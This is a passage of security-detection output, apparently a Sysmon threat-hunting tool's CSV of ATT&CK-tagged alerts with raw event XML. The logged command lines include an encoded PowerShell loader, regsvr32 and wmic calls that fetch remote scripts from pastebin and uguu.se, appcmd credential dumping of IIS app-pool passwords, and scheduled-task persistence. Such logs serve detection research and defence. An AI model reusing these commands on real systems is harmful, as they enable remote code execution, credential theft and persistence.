<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.121924Z"">
</TimeCreated>
<EventRecordID>5913</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.081</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C87FF00</Data>
<Data Name=""ProcessId"">2896</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T16:49:05.736570Z"">
</TimeCreated>
<EventRecordID>892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 16:49:05.686</Data>
<Data Name=""ProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">c:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CE84-5CE6-0000-001094130600</Data>
<Data Name=""ParentProcessId"">2940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
</TimeCreated>
<EventRecordID>16793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
<Data Name=""ProcessId"">1912</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ParentProcessId"">1420</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
</TimeCreated>
<EventRecordID>16793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
<Data Name=""ProcessId"">1912</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ParentProcessId"">1420</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:25.202819Z"">
</TimeCreated>
<EventRecordID>4915</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:24.152</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49828</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
</TimeCreated>
<EventRecordID>14</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
<Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
<Data Name=""ProcessId"">3576</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
</TimeCreated>
<EventRecordID>14</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
<Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
<Data Name=""ProcessId"">3576</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:59.578070Z"">
</TimeCreated>
<EventRecordID>6195</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-05-27 15:12:59.558</Data>
<Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010D6820C00</Data>
<Data Name=""ProcessId"">4044</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
<Data Name=""ParentProcessId"">4012</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.041809Z"">
</TimeCreated>
<EventRecordID>5910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.011</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C83FF00</Data>
<Data Name=""ProcessId"">2472</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
